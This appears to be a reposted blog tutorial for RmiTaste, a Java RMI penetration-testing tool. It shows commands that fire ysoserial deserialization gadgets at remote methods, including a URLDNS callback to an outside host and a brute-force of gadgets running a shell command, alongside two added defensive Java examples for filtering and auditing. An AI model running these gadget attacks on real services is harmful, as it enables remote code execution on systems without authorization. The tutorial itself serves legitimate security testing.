RmiTaste
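RmiTaste helps security researchers detect, enumerate, interact with and attack RMI services by calling remote methods with gadgets provided by ysoserial. It also lets us call remote methods with specific parameters.
The main purpose of RmiTaste is to help security professionals identify insecure RMI services on target systems. Unauthorized access to a target computer system is illegal, and RmiTaste must only be used in lawful scenarios.
Building and running the tool
Note that this tool requires OpenJDK v11.0.3.
First, download ysoserial-master-SNAPSHOT.jar and store it in the libs_attack directory. The download address is: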
https://github.com/frohoff/ysoserial
Second, build the project with maven:
mvn package
Next, run the following command:
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste -h
@author Marcin Ogorzelski (mzero - @_mzer0)
STM Solutions
Warning: RmiTaste was written to aid security professionals in identifying the insecure use of RMI services on systems which the user has prior permission to attack. RmiTaste must be used in accordance with all relevant laws. Failure to do so could lead to your prosecution. The developers assume no liability and are not responsible for any misuse or damage caused by this program.
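Usage
RmiTaste provides four modes: conn, enum, attack and call. Each mode has its own help menu:
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste -h
(...)
Usage: <main class> [-h] [COMMAND]
  -h, --help   Show this help message
Commands:
  conn     Check the connection to the host
  enum     Enumerate RMI services
  attack   Attack RMI registry methods
  call     Call a specific method of an RMI remote object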
conn mode
conn mode lets us determine whether a target port is an RMI service port:
# Check if 127.0.0.1:1099 is RMI Service
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste conn -t 127.0.0.1 -p 1099
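enum mode
enum mode lets researchers obtain information about an RMI service, such as the remote object names and the names of the classes and interfaces the remote objects extend and implement. If the interface implemented by a remote object is accessible on the RmiTaste classpath, RmiTaste prints all of its remote methods, which can then be called directly:
# RMI service enumeration
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum -t 127.0.0.1 -p 1099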
attack mode
attack mode calls remote methods with specific gadget chains from ysoserial. Suppose the remote object has the following methods:
acc1 [object] [127.0.1.1:38293]
    implements java.rmi.Remote [interface]
    extends java.lang.reflect.Proxy [class]
    implements m0.rmitaste.example.server.ClientAccount [interface]
        setPin(java.lang.String param0); [method]
            Parameters: param0; may be vulnerable to Java Deserialization! [info]
        getBalance(); [method]
        deposit(java.lang.Object param0); [method]
            Parameters: param0; may be vulnerable to Java Deserialization! [info]
        withdraw(float param0); [method]
# Call all remote methods with URLDNS gadget as parameter
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -g "URLDNS" -c "http://rce.mzero.pl"
# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with URLDNS gadget as parameter
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -g "URLDNS" -c "http://rce.mzero.pl"
The "-gen bruteforce" option also lets us brute-force remote methods:
# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with gadgets from ysoserial and command ping 127.0.0.1
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -gen bruteforce -c "ping 127.0.0.1"
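On the service side, the object-typed parameters that attack mode exercises can be restricted with a deserialization filter. This added example (not from the original article or the RmiTaste project) exports a remote object with the Java 9+ UnicastRemoteObject.exportObject(Remote, int, ObjectInputFilter) overload; the Account interface, the AccountImpl class and the allow-list are assumptions made for illustration.

```java
import java.io.ObjectInputFilter;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;

public class FilteredExport {

    // Hypothetical remote interface with one object-typed parameter,
    // modelled on the deposit(java.lang.Object) method in the listing above.
    public interface Account extends Remote {
        void deposit(Object amount) throws RemoteException;
    }

    static class AccountImpl implements Account {
        private double balance;

        @Override
        public synchronized void deposit(Object amount) {
            // Validate the type again in application code; the filter is a second layer.
            if (!(amount instanceof Number)) {
                throw new IllegalArgumentException("numeric amount required");
            }
            balance += ((Number) amount).doubleValue();
        }
    }

    // Strong reference so the exported object is not garbage-collected.
    private static final AccountImpl IMPL = new AccountImpl();

    public static void main(String[] args) throws Exception {
        // Allow-list (assumed for this example): numeric wrappers only, small graphs,
        // and a final "!*" that rejects every other class before it is instantiated.
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
            "maxdepth=5;maxrefs=50;maxbytes=4096;"
            + "java.lang.Number;java.lang.Integer;java.lang.Long;"
            + "java.lang.Float;java.lang.Double;!*");

        // The filter is applied to the arguments of every call on this exported object.
        Account stub = (Account) UnicastRemoteObject.exportObject(IMPL, 0, filter);

        Registry registry = LocateRegistry.createRegistry(1099);
        registry.bind("acc1", stub);
        System.out.println("acc1 exported with a deserialization filter");
    }
}
```

Declaring the narrowest concrete parameter type in the remote interface, instead of java.lang.Object, reduces what the filter has to catch.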
call mode
call mode lets us call a specific method of an RMI remote object. Suppose the remote object has the following methods:
acc1 [object] [127.0.1.1:38293]
    implements java.rmi.Remote [interface]
    extends java.lang.reflect.Proxy [class]
    implements m0.rmitaste.example.server.ClientAccount [interface]
        setPin(java.lang.String param0); [method]
            Parameters: param0; may be vulnerable to Java Deserialization! [info]
        getBalance(); [method]
        deposit(java.lang.Object param0); [method]
            Parameters: param0; may be vulnerable to Java Deserialization! [info]
        withdraw(float param0); [method]
# Call m0.rmitaste.example.server.ClientAccount.getBalance method on acc1 remote object
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:getBalance"
# Call m0.rmitaste.example.server.ClientAccount.setPin("1234") method on acc1 remote object
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:setPin" -mp "string=1234"
Usage example
Click [here] to get the sample server.
First, run the sample server.
Next, enumerate the objects:
root@keyisinyourmind:/media/sf_pentest2/Tools/python/Toolset/Others/RmiTasteTool# java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum -t 127.0.0.1 -p 1099
acc1 [object] [127.0.1.1:42881]
    extends java.rmi.server.RemoteObjectInvocationHandler [class]
    implements java.rmi.Remote [interface]
    extends java.lang.reflect.Proxy [class]
    extends java.rmi.server.RemoteObject [class]
    implements m0.rmitaste.example.server.ClientAccount [interface]
        No methods found. I don't have remote object interface. Give it to me!
acc2 [object] [127.0.1.1:42881]
    extends java.rmi.server.RemoteObjectInvocationHandler [class]
    implements java.rmi.Remote [interface]
    extends java.lang.reflect.Proxy [class]
    extends java.rmi.server.RemoteObject [class]
    implements m0.rmitaste.example.server.ClientAccount [interface]
        No methods found. I don't have remote object interface. Give it to me!
As you can see, RmiTaste needs the interface of the remote object. During a penetration test, we also have to find these interfaces ourselves. In this example, we only need to copy rmitaste.examples-1.0-SNAPSHOT-all.jar into the libs_attack directory. The enumeration output then looks like this:
acc1 [object] [127.0.1.1:42881]
    extends java.rmi.server.RemoteObjectInvocationHandler [class]
    implements java.rmi.Remote [interface]
    extends java.lang.reflect.Proxy [class]
    extends java.rmi.server.RemoteObject [class]
    implements m0.rmitaste.example.server.ClientAccount [interface]
        setPin(java.lang.String param0); [method]
            Parameters: param0; may be vulnerable to Java Deserialization! [info]
        getBalance(); [method]
        deposit(java.lang.Object param0); [method]
            Parameters: param0; may be vulnerable to Java Deserialization! [info]
        withdraw(float param0); [method]
acc2 [object] [127.0.1.1:42881]
    extends java.rmi.server.RemoteObjectInvocationHandler [class]
    implements java.rmi.Remote [interface]
    extends java.lang.reflect.Proxy [class]
    extends java.rmi.server.RemoteObject [class]
    implements m0.rmitaste.example.server.ClientAccount [interface]
        setPin(java.lang.String param0); [method]
            Parameters: param0; may be vulnerable to Java Deserialization! [info]
        getBalance(); [method]
        deposit(java.lang.Object param0); [method]
            Parameters: param0; may be vulnerable to Java Deserialization! [info]
        withdraw(float param0); [method]
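The enum listing marks setPin and deposit, whose parameters are object types, and leaves getBalance and withdraw unmarked. The following added example (not RmiTaste's code and not from the original article) applies the same kind of check to a service's own remote interface with reflection, so an owner can review object-typed parameters before exposing it; the nested ClientAccount interface and its return types are constructed for the example.

```java
import java.lang.reflect.Method;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.util.ArrayList;
import java.util.List;

public class RemoteInterfaceAudit {

    // Constructed stand-in for the ClientAccount interface in the listing above;
    // the return types are assumptions, the listing only shows the parameters.
    public interface ClientAccount extends Remote {
        void setPin(String pin) throws RemoteException;
        float getBalance() throws RemoteException;
        void deposit(Object amount) throws RemoteException;
        void withdraw(float amount) throws RemoteException;
    }

    // One report line per remote method. Parameters that are not Java primitives
    // are unmarshalled as objects on the server, so they are flagged for review.
    static List<String> audit(Class<? extends Remote> iface) {
        List<String> report = new ArrayList<>();
        for (Method m : iface.getMethods()) {
            List<String> objectParams = new ArrayList<>();
            for (Class<?> p : m.getParameterTypes()) {
                if (!p.isPrimitive()) {
                    objectParams.add(p.getName());
                }
            }
            if (objectParams.isEmpty()) {
                report.add(m.getName() + ": primitive parameters only");
            } else {
                report.add(m.getName() + ": REVIEW object-typed parameters " + objectParams);
            }
        }
        return report;
    }

    public static void main(String[] args) {
        // Flags setPin (java.lang.String) and deposit (java.lang.Object),
        // matching the two methods marked in the enum output.
        audit(ClientAccount.class).forEach(System.out::println);
    }
}
```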
Original article, author: 745907710. If you repost it, please credit the source: https://blog.ytso.com/221657.html